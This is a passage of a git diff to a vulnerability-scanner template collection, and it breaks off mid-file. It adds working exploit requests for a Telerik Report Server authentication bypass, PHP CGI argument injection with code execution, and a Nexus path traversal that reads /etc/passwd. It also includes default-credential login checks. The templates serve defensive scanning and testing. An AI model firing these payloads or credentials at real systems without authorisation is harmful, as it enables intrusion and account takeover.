http: - type: status status: - 200 -# digest: 490a0046304402204d3f2a0f97eb7ea7fe180e934519026ed231f12223669f51926597f7209ee4a402201edf5e99628b2435af3325bf2f7cac5db876ef8960118f25a1b0cbe87998d6dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206260c934d288615aaeb670fe5578235b6f88ea430cb576d396053d632dd1dc880220219844f51c66f70e35b91c1c9cebf6a80739618fe718297ec00954bcc77c4dbc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-4358.yaml b/http/cves/2024/CVE-2024-4358.yaml new file mode 100644 index 0000000000..9aefadc722 --- /dev/null +++ b/http/cves/2024/CVE-2024-4358.yaml @@ -0,0 +1,64 @@ +id: CVE-2024-4358 + +info: + name: Progress Telerik Report Server - Authentication Bypass + author: DhiyaneshDK + severity: critical + description: | + In Progress Telerik Report Server, version 2024 Q1 (10.0.24.305) or earlier, on IIS, an unauthenticated attacker can gain access to Telerik Report Server restricted functionality via an authentication bypass vulnerability. + impact: An unauthenticated attacker can gain access to Telerik Report Server restricted functionality via an authentication bypass vulnerability. + remediation: Updating to Report Server 2024 Q2 (10.1.24.514) or later. + reference: + - https://summoning.team/blog/progress-report-server-rce-cve-2024-4358-cve-2024-1800/ + - https://github.com/sinsinology/CVE-2024-4358 + - https://docs.telerik.com/report-server/knowledge-base/registration-auth-bypass-cve-2024-4358 + metadata: + verified: true + max-request: 2 + shodan-query: title:"Log in | Telerik Report Server" + tags: cve,cve2024,telerik,progress,auth-bypass,instrusive +variables: + user: "{{rand_base(6)}}" + pass: "{{rand_base(8)}}" + email: "{{randstr}}@{{rand_base(5)}}.com" + firstname: "{{rand_base(5)}}" + lastname: "{{rand_base(5)}}" + +http: + - raw: + - | + POST /Startup/Register HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + Username={{user}}&Password={{pass}}&ConfirmPassword={{pass}}&Email={{email}}&FirstName={{firstname}}&LastName={{lastname}} + + - | + POST /Token HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + grant_type=password&username={{user}}&password={{pass}} + + matchers: + - type: dsl + dsl: + - 'contains(content_type_2, "application/json")' + - 'contains_all(body_2, "access_token", "userName", "token_type")' + - 'status_code_2 == 200' + condition: and + + extractors: + - type: regex + name: token + part: body_2 + group: 1 + regex: + - '"access_token":"([A-Z0-9a-z_-]+)"' + internal: true + + - type: dsl + dsl: + - '"Username: "+ user' + - '"Password: "+ pass' +# digest: 4b0a00483046022100b40c2678a88f956f4c6349fda05d4d83541374a2907b8731a90941505551b493022100f53a3591f5bd4a3fb03698db001d452302dd2217004277971fc01d9af5e9569f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-4577.yaml b/http/cves/2024/CVE-2024-4577.yaml new file mode 100644 index 0000000000..0a012537a7 --- /dev/null +++ b/http/cves/2024/CVE-2024-4577.yaml @@ -0,0 +1,34 @@ +id: CVE-2024-4577 + +info: + name: PHP CGI - Argument Injection + author: Hüseyin TINTAŞ,sw0rk17,securityforeveryone,pdresearch + severity: critical + description: | + PHP CGI - Argument Injection (CVE-2024-4577) is a critical argument injection flaw in PHP. + impact: | + Successful exploitation could lead to remote code execution on the affected system. + remediation: | + Apply the vendor-supplied patches or upgrade to a non-vulnerable version. + metadata: + verified: true + tags: cve,cve2024,php,cgi,rce + +http: + - method: POST + path: + - "{{BaseURL}}/php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" + - "{{BaseURL}}/index.php?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" + - "{{BaseURL}}/test.php?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" + - "{{BaseURL}}/test.hello?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" + + body: | + <?php echo md5("CVE-2024-4577"); ?> + + stop-at-first-match: true + matchers: + - type: word + part: body + words: + - "3f2ba4ab3b260f4c2dc61a6fac7c3e8a" +# digest: 4a0a004730450221008693eaa1040ef5b904550b0ec8d707667e4de37c2f03bcfb4cb631137ed90caf02203b9468a518628678b56886433cd50d65153bb54d66ac540ef0b535407471c01c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-4956.yaml b/http/cves/2024/CVE-2024-4956.yaml index 2481ee7b18..32e34ce6db 100644 --- a/http/cves/2024/CVE-2024-4956.yaml +++ b/http/cves/2024/CVE-2024-4956.yaml @@ -24,13 +24,15 @@ info: max-request: 1 vendor: sonatype product: nexus - fofa-query: title="Nexus Repository Manager" - tags: cve,cve2024,nexus,lfi + fofa-query: + - title="Nexus Repository Manager" + - title="nexus repository manager" + tags: cve,cve2024,nexus,lfi,sonatype http: - method: GET path: - - "{{BaseURL}}/%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd" + - "{{BaseURL}}/%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd" matchers: - type: dsl @@ -39,4 +41,4 @@ http: - contains(header, "application/octet-stream") - status_code == 200 condition: and -# digest: 4b0a00483046022100d04cb6a8b4f715247f0046035995368961f1e380721d9a061a68fbcdf728ad70022100c807dbccfb625a6ee33ef8333433686a5a437f066cc9ecdd6c8a5aac4923bed9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202a7b25f9491118611601e54fc059c402e3e33091cab3c23e78360700c3e111db022000eb7088fe6c09b5cb1896a2296d7331e0036e4686346643a7cf000e2b80315a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-5230.yaml b/http/cves/2024/CVE-2024-5230.yaml new file mode 100644 index 0000000000..8e9a21cbc1 --- /dev/null +++ b/http/cves/2024/CVE-2024-5230.yaml @@ -0,0 +1,44 @@ +id: CVE-2024-5230 +info: + name: FleetCart 4.1.1 - Information Disclosure + author: securityforeveryone + severity: medium + description: | + Issues with information disclosure in redirect responses. Accessing the majority of the website's pages exposes sensitive data, including the "Razorpay" "razorpayKeyId". + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2024-5230 + - https://packetstormsecurity.com/files/178770/FleetCart-4.1.1-Information-Disclosure.html + - https://codecanyon.net/item/fleetcart-laravel-ecommerce-system/23014826 + - https://vuldb.com/?ctiid.265981 + - https://vuldb.com/?id.265981 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2024-5230 + cwe-id: CWE-200 + epss-score: 0.00045 + epss-percentile: 0.15047 + metadata: + verified: true + max-request: 1 + shodan-query: html:"FleetCart" + tags: cve,cve2024,packetstorm,cms,fleetcart,info-leak + +http: + - method: GET + path: + - "{{BaseURL}}/en/products?query=123" + + matchers-condition: and + matchers: + - type: dsl + dsl: + - 'contains_all(body, "razorpayKeyId:", "loggedIn:", "storeName:")' + - 'status_code == 200' + condition: and + + - type: word + words: + - "razorpayKeyId: ''" + negative: true +# digest: 4a0a0047304502202589ef7ca56aded6f60e4a6c0894c0b451861abb90f144b7ae86726f61ea08660221009037f9cdb2941ceee500ec88de24b43cc3c61b752e03131c46470c4a62ea090a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/default-logins/3com/3Com-wireless-default-login.yaml b/http/default-logins/3com/3Com-wireless-default-login.yaml index 321a07e084..afcda3aa92 100644 --- a/http/default-logins/3com/3Com-wireless-default-login.yaml +++ b/http/default-logins/3com/3Com-wireless-default-login.yaml @@ -9,8 +9,8 @@ info: reference: - https://www.speedguide.net/routers/3com-wl-546-3com-wireless-8760-dual-radio-11abg-1256 metadata: - max-request: 1 - fofa-query: title="3COM" + max-request: 2 + fofa-query: "title=\"3COM\"" tags: default-login,3com http: @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100a7a5661481f35e84ca927a1574e6a7b1b27ccb361354be2361a526339dec9a5502210098c54dbb1de14bbe6bc295ca69566df20d65ab0b3bb0f9ffcdf3f8815c7684cc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100aa98c552ff821787da07454a86d3b1ffcd7967dbb4b411a95d430b53a7ccc1af02207ccff574e15cfc77d39a88086cc3f5087f31e4a60962c412cf82800390358b54:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/default-logins/ampjuke-default-login.yaml b/http/default-logins/ampjuke-default-login.yaml new file mode 100644 index 0000000000..225cf5ab6b --- /dev/null +++ b/http/default-logins/ampjuke-default-login.yaml @@ -0,0 +1,62 @@ +id: ampjuke-default-login + +info: + name: AmpJuke - Default Login + author: ritikchaddha + severity: high + description: | + AmpJuke contains a default login vulnerability. Default admin login password 'pass' was found. + metadata: + max-request: 3 + shodan-query: "http.favicon.hash:-121681558" + tags: default-login,ampjuke + +http: + - raw: + - | + GET /login.php HTTP/2 + Host: {{Hostname}} + + - | + POST /loginvalidate.php HTTP/2 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + uuid={{url_encode(token)}}&login={{username}}&password={{password}}&Submit=Submit + + - | + GET /index.php?what=welcome HTTP/2 + Host: {{Hostname}} + + attack: pitchfork + payloads: + username: + - admin + password: + - pass + + matchers-condition: and + matchers: + - type: word + part: body_3 + words: + - 'AmpJuke' + - 'Track' + - 'Logout' + - 'Random play' + condition: and + case-insensitive: true + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body_1 + name: token + group: 1 + regex: + - 'name="uuid" value="([./a-z0-9-]+)">' + internal: true +# digest: 4b0a004830460221009a7d7a4053a55ee2fd87bdb54447c57918b5e01753144450843af403ebb10aa40221009417d55a42799dd32bc24720a398c20dcea43f7f16c933fae4ec213ea2ea75fe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/default-logins/asus/asus-rtn16-default-login.yaml b/http/default-logins/asus/asus-rtn16-default-login.yaml index 6e555fad8a..72162ff57a 100644 --- a/http/default-logins/asus/asus-rtn16-default-login.yaml +++ b/http/default-logins/asus/asus-rtn16-default-login.yaml @@ -5,11 +5,11 @@ info: author: ritikchaddha severity: high description: | - ASUS RT-N16 contains a default login vulnerability. Default admin login password 'admin' was found. + ASUS RT-N16 contains a default login vulnerability. Default admin login password 'admin' was found. metadata: + verified: true max-request: 1 shodan-query: "RT-N16" - verified: true tags: default-login,asus,rt-n16 http: @@ -40,4 +40,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100e5edc14dff54097d5cd074539630205b93a4e24cb03cb7e5fd3b70cae381045b022055263b212fe7e1e32e458b2613e266d061932ef673f26709afb626a3e3797b87:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200b8798bc6edb6d74920650e18ac885759f155e31874f0c2ae1ab825e5f9ab621022100ea2e7c324d3921ccc0dcb7436c5e57ae3aec0e3396d4c5cf1f7a010f6e688192:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/default-logins/asus/asus-wl500g-default-login.yaml b/http/default-logins/asus/asus-wl500g-default-login.yaml index 1e874faedb..9781cb94c5 100644 --- a/http/default-logins/asus/asus-wl500g-default-login.yaml +++ b/http/default-logins/asus/asus-wl500g-default-login.yaml @@ -5,11 +5,11 @@ info: author: ritikchaddha severity: high description: | - ASUS WL-500 contains a default login vulnerability. Default admin login password 'admin' was found. + ASUS WL-500 contains a default login vulnerability. Default admin login password 'admin' was found. metadata: + verified: true max-request: 1 shodan-query: "WL-500G" - verified: true tags: default-login,asus,wl-500 http: @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502206359a6512f7d913a8a6eaaa9e886376e8ff7c73119f7b6dcbef2d6175e2a2fc5022100e260842f0946002cb0728695b1832997d779927462b2f4deefd55da09193f5d2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009741ffb4288b9f348c9f0d137da96526ddacb9d3b3e8320b4754b7c210d8726902202df21b78a91a18c5a59cef1064bfa447d02b2426f31bff9d528f4f247c93793c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/default-logins/asus/asus-wl520GU-default-login.yaml b/http/default-logins/asus/asus-wl520GU-default-login.yaml index a972e1e1c2..8c013d4f4f 100644 --- a/http/default-logins/asus/asus-wl520GU-default-login.yaml +++ b/http/default-logins/asus/asus-wl520GU-default-login.yaml @@ -5,11 +5,11 @@ info: author: ritikchaddha severity: high description: | - ASUS WL-520GU contains a default login vulnerability. The default admin login password 'admin' was found. + ASUS WL-520GU contains a default login vulnerability. The default admin login password 'admin' was found. metadata: + verified: true max-request: 1 shodan-query: "WL-520GU" - verified: true tags: default-login,asus,wl-520gu http: @@ -39,4 +39,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022017c5ae1ae8978c04a3cb2dc914cbbfec2fb928e5f41a2a47fd176bfca251208a02203e93dc759abb343620866936cfc3cad973727bab49420ad7e0781524ca285cbf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022042345f2170e2313f96816d27d32f98a5c6ca83429352472aa0d1dcbd0e7fd3db02206c6b669ae9a7b7e19e2b353e5500ec80bd63728626b5342e5bf8114c6b591aa5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/default-logins/cambium-networks/cambium-networks-default-login.yaml b/http/default-logins/cambium-networks/cambium-networks-default-login.yaml index eeacaeb7fa..76b1c780ce 100644 --- a/http/default-logins/cambium-networks/cambium-networks-default-login.yaml +++ b/http/default-logins/cambium-networks/cambium-networks-default-login.yaml @@ -8,8 +8,8 @@ info: Cambium Networks / Motorola Canopy 5750AP ADVANTAGE Access Point 5.7GHz login credentials were discovered. metadata: verified: true - max-request: 1 - fofa-query: title="Welcome to Canopy" + max-request: 2 + fofa-query: "title=\"Welcome to Canopy\"" tags: default-login,cambium,canopy http: @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022060ca7e028b3cacd5e75c469c3b8df897700ecb1fa9e91f15b05eb6a50d9f2d31022100ab396afa79123b660bb4784387663ed5eb3f9767485f162c73fbe565f1fa8bbe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022076e7f3e1a391ff7d8ae2709eac96e31007b48f86619ecded424f9bef3611d737022022431077acf65343c974693dd7a515230bc9e122025d2a3a48ee80ec67df15aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/default-logins/crushftp/crushftp-anonymous-login.yaml b/http/default-logins/crushftp/crushftp-anonymous-login.yaml index e768a596a1..08ca9f474e 100644 --- a/http/default-logins/crushftp/crushftp-anonymous-login.yaml +++ b/http/default-logins/crushftp/crushftp-anonymous-login.yaml @@ -7,10 +7,10 @@ info: description: | CrushFTP Anonymous login credentials were discovered. metadata: - shodan-query: html:"CrushFTP" verified: true max-request: 2 - tags: default-logins,anonymous,crushftp + shodan-query: html:"CrushFTP" + tags: default-logins,anonymous,crushftp,default-login http: - raw: @@ -47,4 +47,4 @@ http: group: 1 regex: - 'currentAuth=([0-9a-zA-Z]+)' -# digest: 490a00463044022047ed09e7cce78c6ef3d5812fd4d9f0c9b9325f82c20c0eeaaa4b280b7853ec810220750d2e91ea2a302be6eebf420b4dee340c13ff61593ff73ac8ba9db2582b68cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200c5a041237930d9a2d13bbdd1937389e71363cf051dc4e6811eaa132f7484060022100b71429de7b114bd8165650fc5ef949e6ab6138c5dd79e57fb16c60fa32c18ada:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/default-logins/crushftp/crushftp-default-login.yaml b/http/default-logins/crushftp/crushftp-default-login.yaml index 4528994223..b906ccff5b 100644 --- a/http/default-logins/crushftp/crushftp-default-login.yaml +++ b/http/default-logins/crushftp/crushftp-default-login.yaml @@ -7,9 +7,9 @@ info: description: | CrushFTP default login credentials were discovered. metadata: - shodan-query: html:"CrushFTP" verified: true max-request: 2 + shodan-query: html:"CrushFTP" tags: default-login,crushftp http: @@ -56,4 +56,4 @@ http: group: 1 regex: - 'currentAuth=([0-9a-zA-Z]+)' -# digest: 490a00463044022077f7dbd7c50db82f80d82e6ee234480f22902da10583351bd3a36193999e5d08022024b534bb71d7933f1bdc11a7cda6962359609655e1df2e567be4f77eecf8fc65:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206cda74422b8792aa62859df68d922613d4db22ba6e374a674cc2896bb813426f0221008cd32f2eb5cdc98370da14ba0f39a260c3868ac8bd6bbc336c08d41f3122b9a4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/default-logins/digital-watchdog/digital-watchdog-default-login.yaml b/http/default-logins/digital-watchdog/digital-watchdog-default-login.yaml new file mode 100644 index 0000000000..31025377bc --- /dev/null +++ b/http/default-logins/digital-watchdog/digital-watchdog-default-login.yaml @@ -0,0 +1,45 @@ +id: digital-watchdog-default-login + +info: + name: Digital Watchdog - Default Login + author: omranisecurity + severity: high + description: | + Digital Watchdog default login credentials were discovered. + reference: + - https://digitalwatchdog.happyfox.com/kb/article/686-recorder-and-raid-default-login-list/ + metadata: + verified: true + max-request: 8 + shodan-query: "http.favicon.hash:868509217" + fofa-query: "icon_hash=\"868509217\"" + tags: digital-watchdog,default-login,dw-Spectrum + +http: + - raw: + - | + POST /web/rest/v1/login/sessions HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"username":"{{user}}","password":"{{pass}}","setCookie":true} + + attack: clusterbomb + payloads: + user: + - admin + - dwuser + pass: + - admin + - admin1234 + - admin12345 + - Dw5pectrum + + matchers: + - type: dsl + dsl: + - 'contains_all(set_cookie, "x-runtime-guid=")' + - 'contains(body, "token\":")' + - 'status_code == 200' + condition: and +# digest: 4a0a00473045022100aee82448d2b859ebed86fa4a6d5ee4815eb4371ad4a7f08f76d00826ad289368022065b78bff7ec88bb376d4e6ad0f0d1ec68bf92441cb0df53c92db0b09b22b2369:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/default-logins/next-terminal/next-terminal-default-login.yaml b/http/default-logins/next-terminal/next-terminal-default-login.yaml index fd94360b85..3236d07384 100644 --- a/http/default-logins/next-terminal/next-terminal-default-login.yaml +++ b/http/default-logins/next-terminal/next-terminal-default-login.yaml @@ -9,9 +9,9 @@ info: reference: - https://github.com/dushixiang/next-terminal metadata: + verified: true max-request: 1 fofa-query: title="Next Terminal" - verified: true tags: default-login,next-terminal,next http: @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022047000b6be585f125bb59e74eaa3738df10e5fedd6f7f79daf80c87bd334d0244022100aa08bbf3a773e10611aa8076f9ead21582e2b7e190382f247d48976fb5618328:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207ea452aa3edf4359543aeba89e001e84f36f779367d8c76129f154627ccbdb52022100ad72c1438aec12604dcf1c7b0eadd55dabe7e0e05424f32bf81e21c9e43624f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/default-logins/pentaho/pentaho-default-login.yaml b/http/default-logins/pentaho/pentaho-default-login.yaml index 11b51557b7..18cf2bb441 100644 --- a/http/default-logins/pentaho/pentaho-default-login.yaml +++ b/http/default-logins/pentaho/pentaho-default-login.yaml @@ -14,6 +14,8 @@ info: metadata: max-request: 1 shodan-query: pentaho + product: vantara_pentaho + vendor: hitachi tags: pentaho,default-login http: @@ -44,5 +46,4 @@ http: - type: status status: - 302 - -# digest: 490a0046304402207879c4c3d158c1befbc85369695e7c809e1c3321bfd3f41c3c14de63f25a565202206992c6b32c87dcec119c635edb212470f39effb0255284d3fa477e3581a0722e:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100f94a93c2846615bada88a7601c151a2a077f1a5dc685091ba32f0b843a6b835202205b1740da45db8dfc7709ac56c987e64787ed3bb553493621319effc696b43593:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/default-logins/soplanning/soplanning-default-login.yaml b/http/default-logins/soplanning/soplanning-default-login.yaml index 817121268f..a864c3b419 100644 --- a/http/default-logins/soplanning/soplanning-default-login.yaml +++ b/http/default-logins/soplanning/soplanning-default-login.yaml @@ -13,7 +13,10 @@ info: max-request: 1 vendor: soplanning product: soplanning - shodan-query: html:"soplanning" + shodan-query: + - html:"soplanning" + - http.html:"soplanning" + fofa-query: body="soplanning" tags: soplanning,default-login http: @@ -46,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b3d86e9e10bde636e6ff84016fd5241457bcac181d4c2b3192a646880f744dc902205cb3645bb990dc1492bf69406d5d8bdf9cfb6c1f2673f843d980c65713f09a92:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ed3e90edb887b3afe18c82dc97b8cafed0afec1caa9805760b7b25ed0c8061b402203df1005a13d3becd420466f831f1cae1d89797f5c40c5a0dd90fd71c417b2d96:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/default-logins/structurizr/structurizr-default-login.yaml b/http/default-logins/structurizr/structurizr-default-login.yaml index fb0db3fe69..c4f830c66e 100644 --- a/http/default-logins/structurizr/structurizr-default-login.yaml +++ b/http/default-logins/structurizr/structurizr-default-login.yaml @@ -12,6 +12,9 @@ info: verified: true max-request: 3 shodan-query: http.favicon.hash:1199592666 + product: on-premises_installation + vendor: structurizr + fofa-query: icon_hash=1199592666 tags: structurizr,default-login http: @@ -58,5 +61,4 @@ http: regex: - 'name="_csrf" value="([0-9a-z-]+)"' internal: true - -# digest: 490a00463044022000bee996e0a22c9c6fc5cf0762ecaeee4e63c7b49cd44bedf30c15279c7323f402204e76001706df14f1509bf3dcbed38250e5ab7e925e877eea06fcb29b85d84f04:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022016aa85f49f5226bbeceb6908dae2fe5c9f9e4bea974ea8033fc2df4d8009515c022100d58b7a86bb985ee3cdae003b41130d3d9f3aca9396e309bb83d63da4a2ca59bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/default-logins/timekeeper/timekeeper-default-login.yaml b/http/default-logins/timekeeper/timekeeper-default-login.yaml index 8fc8bb40d7..80093aa2e0 100644 --- a/http/default-logins/timekeeper/timekeeper-default-login.yaml +++ b/http/default-logins/timekeeper/timekeeper-default-login.yaml @@ -12,6 +12,9 @@ info: verified: true max-request: 1 shodan-query: http.favicon.hash:2134367771 + product: timekeeper + vendor: fsmlabs + fofa-query: icon_hash=2134367771 tags: timekeeper,default-login http: @@ -42,5 +45,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502207d17c8359af61021decdaba59da226acf87ee8cdba8e3fb902695de3029e9547022100c67b56b1c80cebea6a8dcf167e09be028622328147e4cbbab6e8e4bbebfb1a9c:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402200167fb19f67315e12bb1973948e435706d6a0d0929b59c107376883031e4a0f902200652bd3ca5216abfa80724d862d5a5207345253ddc78a81d23785cabd86d6790:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/default-logins/wazuh-default-login.yaml b/http/default-logins/wazuh-default-login.yaml index 2f31694d0f..bb7941c4d8 100644 --- a/http/default-logins/wazuh-default-login.yaml +++ b/http/default-logins/wazuh-default-login.yaml @@ -12,8 +12,8 @@ info: - https://documentation.wazuh.com/current/deployment-options/docker/wazuh-container.html#single-node-deployment metadata: verified: true - max-request: 6 - shodan-query: title:"Wazuh" + max-request: 7 + shodan-query: "title:\"Wazuh\"" tags: wazuh,default-login http: @@ -69,4 +69,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ab2051c304c035f5529f66430ea1105c4cf31c1d8f5ff87e994cf6f1061c1f7202204a9b106ace1ff87641cc961e9aa127bed0852ca04614f8d5ef2ed286a17d85bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009455b6beb3dd3660a1acfbfb547e2a94b8160fcbf9501c51f246568d7d26b21702204c46b154f7b28cad6aa4a6fc66515aff039e95ba59642d2b70729598de351bdb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/default-logins/xxljob/xxljob-default-login.yaml b/http/default-logins/xxljob/xxljob-default-login.yaml index ae2e65c308..104c147ec3 100644 --- a/http/default-logins/xxljob/xxljob-default-login.yaml +++ b/http/default-logins/xxljob/xxljob-default-login.yaml @@ -15,6 +15,9 @@ info: verified: true max-request: 2 shodan-query: http.favicon.hash:1691956220 + product: xxl-job + vendor: xuxueli + fofa-query: icon_hash=1691956220 tags: default-login,xxljob http: @@ -59,5 +62,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100ae974bb59eb8265058d71d65ba977414da678ac9714b4de0271be9aaad80162e022100c5e2778b9fd6d3563f74836c593566f4319ec48c6de63b985cbb63aaf0701491:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402200c145af892aa3abf672da329d31e296cc91ff64cf70c45c86ea32c3b08bf786e02204b533085635f6f4ba005d66179b8283889032c6b226b8c2a523ff1f6b8108233:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/default-logins/zabbix/zabbix-default-login.yaml b/http/default-logins/zabbix/zabbix-default-login.yaml index 0f957d6459..c8910d4a06 100644 --- a/http/default-logins/zabbix/zabbix-default-login.yaml +++ b/http/default-logins/zabbix/zabbix-default-login.yaml @@ -12,7 +12,7 @@ info: cvss-score: 8.3 cwe-id: CWE-522 metadata: - max-request: 1 + max-request: 2 tags: zabbix,default-login http: @@ -45,4 +45,4 @@ http: - type: status status: - 302 -# digest: 4a0a0047304502206c2b96efb385e67d611c7276844293bc88783570392f427628e2a4c05dd7a3b502210094b16a3c48cce397175fe585743b9e87e3db962d6a73a6ec20ca8c5881c9a8be:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200e8039b865b54ee0e55901abd00344110d74f2062b071b8f79d2b3e95a6f97f902203e2a3ff1cd9d452d38caa938749b26f58f6bc699ec304a7ef544d3b357e63715:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/3cx-phone-management-panel.yaml b/http/exposed-panels/3cx-phone-management-panel.yaml index 2a0e1a613a..ce22cf23f1 100644 --- a/http/exposed-panels/3cx-phone-management-panel.yaml +++ b/http/exposed-panels/3cx-phone-management-panel.yaml @@ -14,13 +14,22 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:3cx:3cx:*:*:*:*:*:*:*:* metadata: - google-query: intitle:"3CX Phone System Management Console" max-request: 1 + vendor: 3cx product: 3cx shodan-query: - http.title:"3CX Phone System Management Console" - http.favicon.hash:970132176 - vendor: 3cx + - http.title:"3cx webclient" + - http.title:"3cx phone system management console" + google-query: + - intitle:"3CX Phone System Management Console" + - intitle:"3cx phone system management console" + - intitle:"3cx webclient" + fofa-query: + - icon_hash=970132176 + - title="3cx phone system management console" + - title="3cx webclient" tags: panel,3cx http: @@ -34,4 +43,4 @@ http: - "3CX Phone System Management Console" - "Welcome to the 3CX Management Console" condition: or -# digest: 4a0a0047304502203780f52a668c97f351e08942ed81928742a986b3844ec6ea48dd292d385e8996022100bf37bba4863af2671c39d779c0290d83f3c3eccd6563353643d25c2154d7fc1f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207223b1de24511de428c99eea66db61e5d1f7874fcfb760ab91d02602025df3b60220701914f284614ab2d3e67d208297155a3c9f7ac21c6ca1ba9397152e45c68c63:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/3cx-phone-webclient-management-panel.yaml b/http/exposed-panels/3cx-phone-webclient-management-panel.yaml index 9b2a5c4d3e..8cb041ca8e 100644 --- a/http/exposed-panels/3cx-phone-webclient-management-panel.yaml +++ b/http/exposed-panels/3cx-phone-webclient-management-panel.yaml @@ -14,11 +14,22 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:3cx:3cx:*:*:*:*:*:*:*:* metadata: - google-query: intitle:"3CX Webclient" max-request: 1 - product: 3cx - shodan-query: http.title:"3CX Webclient" vendor: 3cx + product: 3cx + shodan-query: + - http.title:"3CX Webclient" + - http.title:"3cx webclient" + - http.title:"3cx phone system management console" + - http.favicon.hash:970132176 + google-query: + - intitle:"3CX Webclient" + - intitle:"3cx phone system management console" + - intitle:"3cx webclient" + fofa-query: + - icon_hash=970132176 + - title="3cx phone system management console" + - title="3cx webclient" tags: panel,3cx http: @@ -32,4 +43,4 @@ http: - " <title>3CX Webclient" - '' condition: or -# digest: 4a0a00473045022100f60c410ca197feff3a6ae75f85110d48d1de1eed7b721fcdc802e824bcbf1dbb02202150b4cc1ee3346432bbb961f31f63d085928cad61b631852434da1a9e690232:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200a5151965ace29d1dafc3469f50c2f7136477a080501769e7a13e5fbafe83117022100968191d985f1a1153be61bb5e77cd24f615b998e60d6c7815f6d87226274a26c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/acemanager-login.yaml b/http/exposed-panels/acemanager-login.yaml index 9ab19d6a3b..cec876182e 100644 --- 